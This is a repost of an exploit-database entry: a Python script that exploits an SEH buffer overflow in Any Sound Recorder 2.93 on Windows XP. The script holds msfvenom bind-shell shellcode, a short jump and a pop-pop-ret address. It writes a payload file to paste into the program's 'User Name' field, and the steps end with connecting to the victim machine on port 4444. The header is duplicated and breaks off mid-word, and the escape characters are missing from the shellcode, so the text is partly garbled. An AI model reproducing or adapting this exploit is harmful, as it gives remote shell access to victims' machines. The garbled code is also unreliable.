Any Sound Recorder 2.93 Buffer Overflow

Details: Written by: khalil shreateh; Category: Vulnerabilities; Hits: 251

# Exploit Title: Any Sound Recorder 2.93 - Buffer Overflow (SEH)
# Exploit Author: Abdullah Alic
# Discovery Date: 2018-10-16
# Homepage: http://www.any-sound-recorder.com
# Softwa # Exploit Title: Any Sound Recorder 2.93 - Buffer Overflow (SEH)
# Exploit Author: Abdullah Alic
# Discovery Date: 2018-10-16
# Homepage: http://www.any-sound-recorder.com
# Software Link: http://www.any-sound-recorder.com/anysoundrecorder.exe
# Version: 2.93
# Tested on: Windows XP Professional sp3 (ENG)
# Steps to Reproduce: Run the python exploit script, it will create a new file
# with the name "boom.txt". Copy the content of the "boom.txt".
# Start Any Sound Recorder 2.93 click "Enter Key Code" Paste the content into field "User Name" click "Register"
# Connect victim machine on port 4444

#!/usr/bin/python

#Payload size: 355 bytes
#msfvenom -p windows/shell_bind_tcp -b "x00x0ax0d" -f python
buf = ""
buf += "xb8x67x21x25x53xddxc0xd9x74x24xf4x5bx31"
buf += "xc9xb1x53x31x43x12x03x43x12x83x8cxddxc7"
buf += "xa6xaexf6x8ax49x4ex07xebxc0xabx36x2bxb6"
buf += "xb8x69x9bxbcxecx85x50x90x04x1dx14x3dx2b"
buf += "x96x93x1bx02x27x8fx58x05xabxd2x8cxe5x92"
buf += "x1cxc1xe4xd3x41x28xb4x8cx0ex9fx28xb8x5b"
buf += "x1cxc3xf2x4ax24x30x42x6cx05xe7xd8x37x85"
buf += "x06x0cx4cx8cx10x51x69x46xabxa1x05x59x7d"
buf += "xf8xe6xf6x40x34x15x06x85xf3xc6x7dxffx07"
buf += "x7ax86xc4x7axa0x03xdexddx23xb3x3axdfxe0"
buf += "x22xc9xd3x4dx20x95xf7x50xe5xaex0cxd8x08"
buf += "x60x85x9ax2exa4xcdx79x4exfdxabx2cx6fx1d"
buf += "x14x90xd5x56xb9xc5x67x35xd6x2ax4axc5x26"
buf += "x25xddxb6x14xeax75x50x15x63x50xa7x5ax5e"
buf += "x24x37xa5x61x55x1ex62x35x05x08x43x36xce"
buf += "xc8x6cxe3x7bxc0xcbx5cx9ex2dxabx0cx1ex9d"
buf += "x44x47x91xc2x75x68x7bx6bx1dx95x84x82x82"
buf += "x10x62xcex2ax75x3cx66x89xa2xf5x11xf2x80"
buf += "xadxb5xbbxc2x6axbax3bxc1xdcx2cxb0x06xd9"
buf += "x4dxc7x02x49x1ax50xd8x18x69xc0xddx30x19"
buf += "x61x4fxdfxd9xecx6cx48x8exb9x43x81x5ax54"
buf += "xfdx3bx78xa5x9bx04x38x72x58x8axc1xf7xe4"
buf += "xa8xd1xc1xe5xf4x85x9dxb3xa2x73x58x6ax05"
buf += "x2dx32xc1xcfxb9xc3x29xd0xbfxcbx67xa6x5f"
buf += "x7dxdexffx60xb2xb6xf7x19xaex26xf7xf0x6a"
buf += "x56xb2x58xdaxffx1bx09x5ex62x9cxe4x9dx9b"
buf += "x1fx0cx5ex58x3fx65x5bx24x87x96x11x35x62"
buf += "x98x86x36xa7"

junk = 10000
nseh= "xebx06x90x90" # SHORT JMP 6 bytes
seh= "x35x2fxd1x72" # 0x72d12f35 : pop ebx # pop ebp # ret 0x0c FROM msacm32.drv

buffer = "x90" * 900 + nseh + seh + buf + "x90" * (junk-len(buf))
payload = buffer

#badchars x00 x0a x0d

try:
f=open("boom.txt","w")
print "[+] Creating %s bytes payload..." %len(payload)
f.write(payload)
f.close()
print "[+] File created!"
except:
print "File cannot be created"